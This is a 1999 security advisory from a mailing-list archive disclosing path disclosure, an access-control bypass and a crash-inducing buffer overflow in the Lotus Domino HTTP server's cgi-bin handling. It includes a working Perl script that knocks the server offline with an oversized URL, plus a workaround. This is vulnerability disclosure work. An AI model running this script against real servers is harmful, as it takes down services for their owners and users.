Greetings, Lotus Domino HTTP server can be used as a traditional Web server, with static html documents and cgi-bin scripts handling. These features are turned on by default, and use /cgi-bin virtual path, mapped to <NOTESDATA>\domino\cgi-bin directory. When doing audit of these functions, we found three vulnerabilites in handling of cgi requests: 1. Domino server exposes configuration of local filesystem: When requesting http://server/cgi-bin/blabla, HTTP response is Error 500 Bad script request -- no variation of 'c:/notes/data/domino/cgi-bin/blabla' is executable This can be used to obtain OS and installation details. 2. Turning off anonymous access in server document of Notes Name & Adress Book as no effect for cgi-bin directory : anonymous access is still permitted. The same applies to "SSL redirection of entire server" : cgi-bin can still be accessed via HTTP port. 3. Now the worst ... Handling of response to bad requests (see 1) is vulnerable to a buffer overflow : by sending a large URL relative to cgi-bin, HTTP task crashes immediatly, and does not service requests anymore (including standard Notes database access by HTTP). If Domino is launched as a NT service, service will not stop completly, you need to kill remaining processes (using kill.exe in Reskit) or reboot Windows NT. We notice that all requests does not crash server, but sending 'GET /cgi-bin/... (800 .) aaaa (4000 a) HTTP/1.0' kills nHTTP.exe every time. We were able to reproduce this on all 4.6.X series, including 4.6.6b, wich seems the last version accessible on www.notes.net. I was not able to overwrite return address (just DS), but i made very few tests, and buffer overflow is maybe exploitable to execute arbitrary code. I didn't test Denial of service on Unix versions, but problems 1. and 2. are present. The same remark applies to Domino 5.x. We send several emails to securityat_private in the past 10 days, we receive no answers nor bounces. Demonstration script using Perl LWP module is given below. A nessus plugin will be available in a few hours on http://www.nessus.org/, thanks to Renaud Deraison. Workaround: If you don't use cgi-bin on your Domino server, change cgi-bin virtual directory in server document to something impossible to guess. Leaving field empty has no effect. We didn't find an definitive way to stop cgi-bin handling. Demonstration script: #!/usr/bin/perl -w # This will crash Lotus Domino Server (tested on 4.6.4,4.6.5,4.6.6 and # 4.6.6b). # (c) Alain Thivillon, Stephane Aubert and Herve Schauer Consultants 1999 use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("a"); $target='Insertyourtargetnamehere'; $url="http://".$target."/cgi-bin/".'.'x800; $url.='a'x4000; my $req = new HTTP::Request GET => $url; my $res = $ua->request($req); if ($res->is_success) { print $res->content; } else { print "Well done, Joe\n"; } -- Alain Thivillon -+- Alain.Thivillonat_private -+- Hervé Schauer Consultants The world is ending in 10 days, 12 hours, 45 min, 55 sec : save your buffers
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:22:19 PDT